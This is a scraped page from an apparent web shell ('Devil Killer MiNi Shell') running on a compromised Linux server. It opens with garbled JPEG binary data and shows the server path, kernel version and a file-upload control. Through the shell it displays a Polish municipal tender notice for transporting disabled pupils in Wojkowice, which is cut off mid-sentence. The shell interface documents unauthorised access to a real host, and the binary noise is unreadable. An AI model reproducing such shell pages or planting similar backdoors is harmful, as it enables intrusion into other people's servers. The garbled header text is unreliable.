JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230802/0033732201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Wojkowice w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wojkowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257541</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wojkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-580</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.koltun@wojkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wojkowice.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Wojkowice w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f11e850-3112-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00337322</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00048002/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczniów oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Wojkowice w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4f11e850-3112-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/ oraz<br/>poczty elektronicznej.<br/>2. Zamawiający wyznacza następującą osobę do kontaktu z Wykonawcami:<br/>Małgorzata Kołtun: m.koltun@wojkowice.pl<br/>II. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)<br/>3. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków (innych niż wskazanych w pkt II), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem Platformy e-Zamówienia. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia.<br/>4. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: m.koltun@wojkowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”. Korzystanie z Platformy e-Zamówienia jest bezpłatne. Przeglądanie i<br/>pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. W przypadku problemów technicznych i<br/>awarii związanych<br/>z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem<br/>telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl<br/>w zakładce „Zgłoś problem”.<br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem Platformy e-Zamówienia. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany adres email:<br/>m.koltun@wojkowice.pl. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>3. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania za pośrednictwem Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Wojkowice, z siedzibą: Urząd Miasta Wojkowice, ul. Jana III<br/>Sobieskiego 290a, 42-580 Wojkowice; Inspektor Ochrony Danych: iod@wojkowice.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego: Dowóz uczniów oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Wojkowice w<br/>roku szkolnym 2022/2023. WPM.271.48.2022 prowadzonym w trybie podstawowym o wartości poniżej progów unijnych;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej<br/>„ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WPM.271.34.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1.Przedmiotem zamówienia jest zorganizowanie przewozu na trasie miejsce zamieszkania – placówka oświatowa – miejsce zamieszkania dla 4 niepełnosprawnych uczniów, zamieszkałych na terenie Gminy Wojkowice: przy ul. Jana III Sobieskiego, Sucharskiego, którzy obowiązek szkolny będą realizować w następujących placówkach oświatowych: <br/>a) Specjalny Ośrodek Szkolno - Wychowawczy w Będzinie, ul. 11 Listopada 7 – 1 uczeń,<br/>b) Zespół Szkół Specjalnych w Czeladzi, ul. Szpitalna 85 – 3 uczniów.<br/>1.2.Uczniowie niepełnosprawni będą wożeni zgodnie z kalendarzem roku szkolnego placówki, do której uczęszczają w terminie od 4 września 2023r. do 21 czerwca 2024 r., najkrótszą trasą miejsce zamieszkania – placówka oświatowa – miejsce zamieszkania.<br/>1.3. Uczniowie będą odbierani z miejsca zamieszkania w czasie gwarantującym ich dowóz do placówek szkolnych na określoną godzinę, wynikającą z planu lekcyjnego. Odbiór uczniów ze szkoły będzie następował po zakończeniu zajęć lekcyjnych. Dopuszcza się możliwość zmian terminów dowozu, wynikających m.in. ze zwolnień lekarskich uczniów, skrócenia lekcji czy zamknięcia placówki szkolnej. O takiej sytuacji wykonawca będzie powiadamiany przez rodzica ucznia.<br/>1.4 Pojazd wożący uczniów musi być ubezpieczony.<br/>1.5 Oprócz kierowcy, w pojeździe, powinien jechać z uczniami przygotowany do tej pracy opiekun, zgodnie z art. 39 ustawy Prawo oświatowe, który sprawować będzie opiekę nad uczniami w czasie transportu, zapewni pomoc w przemieszczaniu się pomiędzy domem/szkołą a środkiem transportu, wykona niezbędne czynności pielęgnacyjno-opiekuńcze, a w razie potrzeby udzieli pierwszej pomocy przedmedycznej. Osoba ta musi posiadać ukończony kurs „pierwszej pomocy przedmedycznej”. <br/>1.6 Wykonawca zobowiązany jest do sprawowania opieki nad dowożonymi uczniami do momentu przekazania ich pod opiekę uprawnionego pracownika placówki oświatowej, do której uczeń uczęszcza, a w przypadku transportu do domu do momentu oddania pod opiekę pełnoletniego opiekuna. <br/>1.7 Ze względu na możliwą zmianę liczbę dowożonych uczniów niepełnosprawnych samochód powinien mieć przynajmniej 3 miejsca rezerwowe.<br/>1.8 Przed przystąpieniem do realizacji usługi Wykonawca ustali optymalny rozkład dla poszczególnych kursów, wskazujący trasę przejazdu oraz czas odbioru uczniów mając na uwadze konieczność dowiezienia uczniów do placówki zgodnie z planem ich zajęć oraz możliwie najkrótszy czas przebywania uczniów w podróży. Rozkład kursów Wykonawca ustali w porozumieniu z dyrektorami placówek i przedstawi Zamawiającemu.<br/>1.9 Adresy zamieszkania uczniów niepełnosprawnych będą ujęte w załączniku nr 1 do podpisanej umowy.<br/>1.10 WYKONAWCA GWARANTUJE BEZPIECZEŃSTWO OSÓB I MIENIA PODCZAS WYKONYWANIA USŁUG PRZEWOZU UCZNIÓW. ZAMAWIAJĄCY NIE BIERZE ŻADNEJ ODPOWIEDZIALNOŚCI ZA WYPADKI, ZDARZENIA, JAKIEGOKOLWIEK TYPU, W KTÓRYCH WYNIKU NASTĄPI USZKODZENIE CIAŁA, ŚMIERĆ CZY SZKODA MATERIALNA, SPOWODOWANA DZIAŁALNOŚCIĄ WYKONAWCY. WYKONAWCA ZAMÓWIENIA MUSI JE REALIZOWAĆ ZGODNIE Z PRZEPISAMI PRAWA, A W SZCZEGÓLNOŚCI W ZGODZIE Z USTAWĄ Z DNIA 6 WRZEŚNIA 2001 R. O TRANSPORCIE DROGOWYM (TJ. DZ.U.2022.2201 Z DNIA 2022.10.27) Z PÓŹN. ZM.) ORAZ USTAWĄ PRAWO O RUCHU DROGOWYM (T.J. DZ.U.2023.1047 Z DNIA 2023.06.01 Z PÓŹN. ZM.).<br/>1.11 Usługa musi być świadczona pojazdem posiadającym aktualne obowiązkowe ubezpieczenie OC i NW, aktualne badania techniczne dopuszczające pojazd do ruchu.<br/><br/>Szacowana liczba dni realizacji usługi: 182. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria:<br/>1.1. Cena brutto: 60 punktów<br/>1.2. Rok produkcji pojazdu: 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1 Przedmiotem zamówienia jest zorganizowanie przewozu na trasie miejsce zamieszkania – placówka oświatowa – miejsce zamieszkania dla 2 niepełnosprawnych uczniów zamieszkałych na terenie Gminy Wojkowice: przy ul. Jana III Sobieskiego, Maszyńsko, którzy obowiązek szkolny będą realizować w następujących placówkach oświatowych: <br/>a) Ośrodek Rehabilitacyjno – Edukacyjno – Wychowawczy w Chorzowie, ul. Czysta 7 – <br/>1 uczeń,<br/>b) Zespół Szkolno – Przedszkolny dla Dzieci Niesłyszących i Słabosłyszących w Katowicach, ul. Grażyńskiego 17 – 1 uczeń. <br/>1.2 Uczniowie niepełnosprawni będą przewożeni zgodnie z harmonogramem pracy placówek, do których uczęszczają, w terminie:<br/>- w pkt.1.1.a od 4 września 2023r. do 31 sierpnia 2024 r., najkrótszą trasą: miejsce zamieszkania – placówka oświatowa – miejsce zamieszkania;<br/>- w pkt.1.1.b od 4 września 2023r. do 21 czerwca 2024 r., najkrótszą trasą: miejsce zamieszkania – placówka oświatowa – miejsce zamieszkania;<br/>1.3 Uczniowie będą odbierani z miejsca zamieszkania (ul. Jana III Sobieskiego, Maszyńsko), w czasie gwarantującym dowóz do placówki na określoną godzinę, wynikającą z planu zajęć. Odbiór uczniów ze szkoły będzie następował po zakończeniu zajęć. Dopuszcza się możliwość zmian terminów dowozu, wynikających m.in. ze zwolnień lekarskich uczniów, skrócenia zajęć czy zamknięcia placówki. O takiej sytuacji wykonawca będzie powiadamiany przez rodziców uczniów.<br/>1.4 POJAZD WOŻĄCY MUSI BYĆ UBEZPIECZONY ORAZ DOSTOSOWANY DO POTRZEB WOŻONYCH NIEPEŁNOSPRAWNYCH UCZNIÓW ZGODNIE Z USTAWĄ Z DNIA 20 CZERWCA 1997 R. PRAWO O RUCHU DROGOWYM (TJ. DZ.U.2023.1047 Z DNIA 2023.06.01 Z PÓŹN. ZM.), W TYM POJAZD MUSI UMOŻLIWIĆ PRZEWOŻENIE OSOBY NA WÓZKU INWALIDZKIM, MA POSIADAĆ WINDĘ DLA NIEPEŁNOSPRAWNYCH LUB SZYNY UMOŻLIWIAJĄCE WJAZD WÓZKIEM DO POJAZDU.<br/>1.5 Oprócz kierowcy, w pojeździe, powinien jechać z uczniami przygotowany do tej pracy opiekun, zgodnie z art. 39 ustawy Prawo oświatowe, który sprawować będzie opiekę nad uczniami w czasie transportu, zapewni pomoc w przemieszczaniu się pomiędzy domem/szkołą a środkiem transportu, wykona niezbędne czynności pielęgnacyjno-opiekuńcze, a w razie potrzeby udzieli pierwszej pomocy przedmedycznej. Osoba ta musi posiadać ukończony kurs „pierwszej pomocy przedmedycznej”. <br/>1.6 Wykonawca zobowiązany jest do sprawowania opieki nad dowożonymi uczniami do momentu oddania go pod opiekę uprawnionego pracownika placówki oświatowej, do której uczeń uczęszcza, a w przypadku transportu do domu do momentu oddania pod opiekę pełnoletniego opiekuna. <br/>1.7 Ze względu na możliwą zmianę liczbę dowożonych uczniów niepełnosprawnych samochód powinien mieć przynajmniej 1 miejsce rezerwowe.<br/>1.8 Przed przystąpieniem do realizacji usługi Wykonawca ustali optymalny rozkład dla poszczególnych kursów, wskazujący trasę przejazdu oraz czas odbioru ucznia mając na uwadze konieczność dowiezienia ucznia do placówki zgodnie z planem jego zajęć oraz możliwie najkrótszy czas przebywania ucznia w podróży. Rozkład kursów wykonawca ustali z Dyrektorem Ośrodka Rehabilitacyjno – Edukacyjno – Wychowawczego w Chorzowie oraz Dyrektorem Zespołu Szkolno –Przedszkolnego dla Dzieci Niesłyszących i Słabosłyszących w Katowicach.<br/>1.9 Adresy zamieszkania uczniów niepełnosprawnych ujęte będą w załączniku nr 1 do podpisanej umowy.<br/>1.10 Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu uczniów. <br/>ZAMAWIAJĄCY NIE BIERZE ŻADNEJ ODPOWIEDZIALNOŚCI ZA WYPADKI, 